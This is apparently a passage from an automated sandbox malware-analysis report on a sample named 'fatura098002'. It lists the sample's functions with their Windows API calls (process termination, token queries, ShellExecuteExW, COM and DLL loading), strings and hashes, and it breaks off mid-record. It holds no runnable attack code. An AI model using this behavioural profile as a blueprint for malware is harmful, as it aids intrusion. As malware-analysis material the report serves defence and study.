Part of subcall function 00703AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00703A97,?,?,00702E7F,?,?,?,00000000), ref: 00703AC2

_wcslen.LIBCMT ref: 0077587B
CoInitialize.OLE32(00000000), ref: 00775995
CoCreateInstance.COMBASE(0079FCF8,00000000,00000001,0079FB68,?), ref: 007759AE
CoUninitialize.COMBASE ref: 007759CC

Strings

.lnk, xrefs: 00775876, 007758C1, 00775985

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 7ae34ed52ba2cb0f7ac2bcebfb4c9da1480d5517a9dd45bfd14d60e344e3471b
Instruction ID: 11c33e7273a53026254e740be4bb7da2dc650ad7e79da33a0d0630fff12abf46
Opcode Fuzzy Hash: 7ae34ed52ba2cb0f7ac2bcebfb4c9da1480d5517a9dd45bfd14d60e344e3471b
Instruction Fuzzy Hash: CCD163B1A04701DFCB14DF24C484A2ABBE1EF89350F14895DF9899B3A1DB79EC45CB92

Function 0076175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00760FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00760FCA
Part of subcall function 00760FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00760FD6
Part of subcall function 00760FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00760FE5
Part of subcall function 00760FB4: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00760FEC
Part of subcall function 00760FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00761002

GetLengthSid.ADVAPI32(?,00000000,00761335), ref: 007617AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007617BA
RtlAllocateHeap.NTDLL(00000000), ref: 007617C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 007617DA
GetProcessHeap.KERNEL32(00000000,00000000,00761335), ref: 007617EE
HeapFree.KERNEL32(00000000), ref: 007617F5

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Heap$Process$AllocateInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 169236558-0
Opcode ID: 2c20050508ca7b0c80630b283c96d51d1287d2a628941cb26a1a203749ff3a2b
Instruction ID: 5213d4793366b110f0b25e9372ea799a642beb10719dfe412cfa7b78f3822b2b
Opcode Fuzzy Hash: 2c20050508ca7b0c80630b283c96d51d1287d2a628941cb26a1a203749ff3a2b
Instruction Fuzzy Hash: 1411BE71500205FFDF119FA4CC49BAF7BA9EB41355F588019F94297210D739AE41CB64

Function 00723382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00723379,00722FE5), ref: 00723390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0072339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007233B7
SetLastError.KERNEL32(00000000,?,00723379,00722FE5), ref: 00723409

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3c51d46f6bf56bcdcee554550a70059b32e32d42164cac800dac6499d6692612
Instruction ID: be46d0e75deed71e325f3e8d248f1fce419adb7b127fba33f0f5c54b3a735b41
Opcode Fuzzy Hash: 3c51d46f6bf56bcdcee554550a70059b32e32d42164cac800dac6499d6692612
Instruction Fuzzy Hash: 8801F733609331FEAA2637747C89A672B98EB05779720422EF414952F2EF1D4E435558

Function 00732D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00735686,00743CD6,?,00000000,?,00735B6A,?,?,?,?,?,0072E6D1,?,007C8A48), ref: 00732D78
_free.LIBCMT ref: 00732DAB
_free.LIBCMT ref: 00732DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0072E6D1,?,007C8A48,00000010,00704F4A,?,?,00000000,00743CD6), ref: 00732DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0072E6D1,?,007C8A48,00000010,00704F4A,?,?,00000000,00743CD6), ref: 00732DEC
_abort.LIBCMT ref: 00732DF2

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: deac378073b5154e8facfea3b446be4a803bfb0a60a365fa6df3d58f9c656ddd
Instruction ID: 1b9755485af8650596ba34cc85440ed39ced5074ffb4dce5cff8a3a7354cc55f
Opcode Fuzzy Hash: deac378073b5154e8facfea3b446be4a803bfb0a60a365fa6df3d58f9c656ddd
Instruction Fuzzy Hash: C4F0C832715610BBF6232735BC0EF5B2659BFC27A1F244419F824922E3EE2C98035165

Function 00798A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00719639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00719693
Part of subcall function 00719639: SelectObject.GDI32(?,00000000), ref: 007196A2
Part of subcall function 00719639: BeginPath.GDI32(?), ref: 007196B9
Part of subcall function 00719639: SelectObject.GDI32(?,00000000), ref: 007196E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00798A4E
LineTo.GDI32(?,00000003,00000000), ref: 00798A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00798A70
LineTo.GDI32(?,00000000,00000003), ref: 00798A80
EndPath.GDI32(?), ref: 00798A90
StrokePath.GDI32(?), ref: 00798AA0

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: ae3ed36d7934cc163eb4260cc421cbec027101942e03232d7edf9d6447b3d875
Instruction ID: 29eb0e3057634865623936a96a0ae6194d9ede7b77436b838964737012db2e52
Opcode Fuzzy Hash: ae3ed36d7934cc163eb4260cc421cbec027101942e03232d7edf9d6447b3d875
Instruction Fuzzy Hash: 9F11097604014CFFDF129F94EC88EAA7F6DEB08350F00C012FA199A1A1C775AD56DBA4

Function 007651FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00765218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00765229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00765230
ReleaseDC.USER32(00000000,00000000), ref: 00765238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0076524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00765261

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: ba13d27a22dab09da9471b2897ee73c322d4bb1e817b3e08369e221b5e315fb5
Instruction ID: 255f6acba5fbaf3c5c922ff5e7a0503f12f3fe54337e194754428a26dddb3f00
Opcode Fuzzy Hash: ba13d27a22dab09da9471b2897ee73c322d4bb1e817b3e08369e221b5e315fb5
Instruction Fuzzy Hash: F0018FB5A00708BBEF119BA59C49A4EBFB8FB48351F048066FA05A7280D6749801CBA4

Function 00701BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00701BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00701BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00701C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00701C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00701C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00701C22

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 9301c990123db78179f95062be692d60ff009cee9cea926f34246c0f0649664e
Instruction ID: 0b6bea5549b196457eea7d0a2702b650a7444a64445dadfd7c2efb538c22d5a3
Opcode Fuzzy Hash: 9301c990123db78179f95062be692d60ff009cee9cea926f34246c0f0649664e
Instruction Fuzzy Hash: 280167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00415BA15C4BA42C7F5A864CBE5

Function 0076EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0076EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0076EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0076EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0076EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0076EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0076EB75

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 0f5cf283fb1914b39d29c2cc53030dc2f7aab5c86700b6802ad45b9843cee111
Instruction ID: 40295c9ec278f963dfeb74a33a8f884e5641ab3fb7ce65a8ebb8be3258b658cd
Opcode Fuzzy Hash: 0f5cf283fb1914b39d29c2cc53030dc2f7aab5c86700b6802ad45b9843cee111
Instruction Fuzzy Hash: A3F054B2140558BBEB2257529C0EEEF3E7CEFCAB11F00815AF601D1191D7A85A02C6BD

Function 00757439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00757452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00757469
GetWindowDC.USER32(?), ref: 00757475
GetPixel.GDI32(00000000,?,?), ref: 00757484
ReleaseDC.USER32(?,00000000), ref: 00757496
GetSysColor.USER32(00000005), ref: 007574B0

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 07d9feae5ee18715a86383b64ddae2b38a9b392bb4a762882c1bf61a515c7310
Instruction ID: cba0de6d39c14a81aef13f5ac336b4c2bcfbf66fca1a615e9843ecd1db40d3ac
Opcode Fuzzy Hash: 07d9feae5ee18715a86383b64ddae2b38a9b392bb4a762882c1bf61a515c7310
Instruction Fuzzy Hash: FC018B31400205EFDF125FA4EC08BEA7BB5FB04312F618061FD16A20A0CB391E52EB14

Function 0070BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0070BEB3

Strings

D%}D%}, xrefs: 0070BCA5
D%}, xrefs: 0070BCA2
D%}, xrefs: 0070BE9A
D%}, xrefs: 0070BDED, 0070BD91, 0070BD1B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%}$D%}$D%}$D%}D%}
API String ID: 1385522511-1153134958
Opcode ID: e2d196f9c9059ee919bbb274465b47fb30a3bddf35f4d97a890f46d986d1ab80
Instruction ID: 9a312cd0bea1436955fa6bc28194ba46ed948c3373ad3b2f5638721379daf9d8
Opcode Fuzzy Hash: e2d196f9c9059ee919bbb274465b47fb30a3bddf35f4d97a890f46d986d1ab80
Instruction Fuzzy Hash: 20913075A00205DFCB14CF58C090AAAB7F1FF58314F24866ED545A7391E739EE92CBA0

Function 00787B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00720242: RtlEnterCriticalSection.NTDLL(007D070C), ref: 0072024D
Part of subcall function 00720242: RtlLeaveCriticalSection.NTDLL(007D070C), ref: 0072028A

Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD

Part of subcall function 007200A3: __onexit.LIBCMT ref: 007200A9

__Init_thread_footer.LIBCMT ref: 00787BFB

Part of subcall function 007201F8: RtlEnterCriticalSection.NTDLL(007D070C), ref: 00720202
Part of subcall function 007201F8: RtlLeaveCriticalSection.NTDLL(007D070C), ref: 00720235

Strings

+Tu, xrefs: 00787E2E
G, xrefs: 00787C7F
5, xrefs: 00787C78
Variable must be of type 'Object'., xrefs: 00787C3A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +Tu$5$G$Variable must be of type 'Object'.
API String ID: 535116098-335167736
Opcode ID: 212d1cc4c05af658ac9f39fc9e88a0bd25b709c7466ebb80925d02e6b5cff170
Instruction ID: 9b2cbe70e27cdab42dfe82c8e4aed52e060b57e192105b53d4dd0caa576cab47
Opcode Fuzzy Hash: 212d1cc4c05af658ac9f39fc9e88a0bd25b709c7466ebb80925d02e6b5cff170
Instruction Fuzzy Hash: A3918C70A44209EFCB18EF54D895DADB7B6FF44300F248059F806AB292DB79EE41DB61

Function 0076C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00707620: _wcslen.LIBCMT ref: 00707625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0076C6EE
_wcslen.LIBCMT ref: 0076C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0076C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0076C7CA

Strings

0, xrefs: 0076C6AF

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 2e88381773f6ce07390a480c2a47f845cd8494b65541ff14deb33acf70454113
Instruction ID: 59c685cf19b8ed2f30227f3e378eced7c909f096f313aac80d64473f7bd6e8c6
Opcode Fuzzy Hash: 2e88381773f6ce07390a480c2a47f845cd8494b65541ff14deb33acf70454113
Instruction Fuzzy Hash: C151DF71604301ABD7129F28C889A7B77E8AF49310F040A2EFDD6D31D1DB6CE8049B56

Function 0078AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0078AEA3

Part of subcall function 00707620: _wcslen.LIBCMT ref: 00707625

GetProcessId.KERNEL32(00000000), ref: 0078AF38
CloseHandle.KERNEL32(00000000), ref: 0078AF67

Strings

@, xrefs: 0078AE72
<, xrefs: 0078AE6B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 45b3249c7d5346365dc493d7a223476065222399552ee801369c02b1e712d3c4
Instruction ID: 5afe0dd66e83025001399675d725c297426ea8fa21088735584c7f18829085bf
Opcode Fuzzy Hash: 45b3249c7d5346365dc493d7a223476065222399552ee801369c02b1e712d3c4
Instruction Fuzzy Hash: 54717C71A00615EFDB14EF54C489A9EBBF0FF08314F04859AE816AB392CB78ED45CB91

Function 0076719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00767206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0076723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0076724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007672CF

Strings

DllGetClassObject, xrefs: 00767242

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: e0867ab4ead4522b4b1385ed5fdd7b34441f7a40902cca7d80c2e3d6f9b798d5
